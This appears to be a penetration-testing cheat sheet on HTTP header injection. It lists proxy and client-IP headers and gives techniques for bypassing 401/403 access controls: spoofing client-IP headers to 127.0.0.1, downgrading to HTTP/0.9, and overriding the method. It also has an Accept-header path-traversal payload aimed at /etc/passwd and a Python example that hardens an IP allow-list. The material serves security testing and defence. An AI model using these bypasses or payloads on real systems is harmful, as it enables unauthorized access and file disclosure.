HTTP header injection

Main headers

| Header | Purpose | Example |
|---|---|---|
| Client-IP | Client IP passed by proxy (non-standard) | Client-IP: 203.0.113.10 |
| Connection | Controls connection behavior (hop-by-hop) | Connection: keep-alive |
| Contact | Service owner contact info (rare) | Contact: admin@example.com |
| Forwarded | Standard proxy/client info (RFC 7239) | Forwarded: for=203.0.113.10;proto=https;host=example.com |
| From | User email (mostly bots/crawlers) | From: crawler@example.com |
| Host | Target hostname of request | Host: example.com |
| Origin | Request origin (CORS / CSRF) | Origin: https://example.com |
| Referer | Source URL of request | Referer: https://example.com/login |
| True-Client-IP | Original client IP (Akamai) | True-Client-IP: 203.0.113.10 |
| X-Client-IP | Client IP via proxy | X-Client-IP: 203.0.113.10 |
| X-Custom-IP-Authorization | App-specific IP authorization | X-Custom-IP-Authorization: 203.0.113.10 |
| X-Forward-For | Variant of X-Forwarded-For | X-Forward-For: 203.0.113.10 |
| X-Forwarded-For | Original client IP chain | X-Forwarded-For: 203.0.113.10, 10.0.0.1 |
| X-Forwarded-Host | Original Host header | X-Forwarded-Host: example.com |
| X-Forwarded-Server | Proxy/server hostname | X-Forwarded-Server: proxy01 |
| X-Host | Alternate host value | X-Host: example.com |
| X-Original-URL | Original URL before rewrite | X-Original-URL: /admin |
| X-Originating-IP | Client IP (non-standard) | X-Originating-IP: 203.0.113.10 |
| X-Real-IP | Client IP (common in Nginx) | X-Real-IP: 203.0.113.10 |
| X-Remote-Addr | Client IP as seen by server | X-Remote-Addr: 203.0.113.10 |
| X-Remote-IP | Client IP (non-standard) | X-Remote-IP: 203.0.113.10 |
| X-Rewrite-URL | Internal URL rewriting | X-Rewrite-URL: /api/v1/users |
| X-Wap-Profile | Mobile device capabilities | X-Wap-Profile: http://wap.samsungmobile.com/uaprof/SM-G950.xml |

Host Header injections

  • Provide the full URL in the GET request line (absolute-form) instead of just the path

  • Add line wrapping (header line folding)

  • Send the same Host header twice

Bypass type limit

Accept: application/json, text/javascript, */*; q=0.01
Accept: ../../../../../../../../../etc/passwd{{'

401/403 bypasses

Protocol downgrade

Try to change the HTTP version from HTTP/1.1 to HTTP/0.9 and remove the Host header.

HTTP header

Set the client-IP headers listed above to 127.0.0.1 or localhost, in case those values are whitelisted.
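Why this works against a naive allow-list, and what the check should look like instead, as an added example that is not part of the original page: the header list, the allow-listed networks and the trusted-proxy address below are assumptions chosen for illustration.

```python
import ipaddress

# Headers from the table above that carry a client-asserted IP. Any of them can
# be set by whoever sends the request, so the application must not trust them
# unless a proxy it controls has overwritten or appended them.
SPOOFABLE_IP_HEADERS = (
    "client-ip", "true-client-ip", "x-client-ip", "x-custom-ip-authorization",
    "x-forward-for", "x-forwarded-for", "x-originating-ip", "x-real-ip",
    "x-remote-addr", "x-remote-ip",
)

# Assumptions for this example: the allow-list and the address of the reverse
# proxy that terminates client connections (constructed values, not real infra).
ALLOWED_NETS = (ipaddress.ip_network("127.0.0.0/8"), ipaddress.ip_network("10.0.0.0/8"))
TRUSTED_PROXY = ipaddress.ip_address("10.0.0.1")


def _allowed(ip: str) -> bool:
    """True if ip parses and lies in one of the allow-listed networks."""
    try:
        addr = ipaddress.ip_address(ip.strip())
    except ValueError:
        return False
    return any(addr in net for net in ALLOWED_NETS)


def naive_is_internal(headers: dict, remote_addr: str) -> bool:
    """Vulnerable check: believes the first IP header present, whoever sent it."""
    lowered = {k.lower(): v for k, v in headers.items()}
    for name in SPOOFABLE_IP_HEADERS:
        if name in lowered:
            # Leftmost entry of a comma-separated chain is the one the client wrote.
            return _allowed(lowered[name].split(",")[0])
    return _allowed(remote_addr)


def hardened_is_internal(headers: dict, remote_addr: str) -> bool:
    """Hardened check: IP headers count only when the TCP peer is our own proxy,
    and then only the hop that proxy appended (the rightmost X-Forwarded-For
    entry); every other IP header is ignored."""
    if ipaddress.ip_address(remote_addr) != TRUSTED_PROXY:
        return _allowed(remote_addr)  # direct connection: the socket peer is the truth
    lowered = {k.lower(): v for k, v in headers.items()}
    hops = [h.strip() for h in lowered.get("x-forwarded-for", "").split(",") if h.strip()]
    if not hops:
        return False  # the proxy always appends a hop; a missing header fails closed
    return _allowed(hops[-1])
```

The same request with X-Real-IP: 127.0.0.1 from an external address passes the naive check and fails the hardened one, and a client-prepended 127.0.0.1 in X-Forwarded-For is ignored because only the proxy-appended hop is evaluated.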

Fake Origin

Instead of /admin, also try the absolute URL https://domain.com/admin

Method Override

X-HTTP-Method-Override: PUT

Wordlists
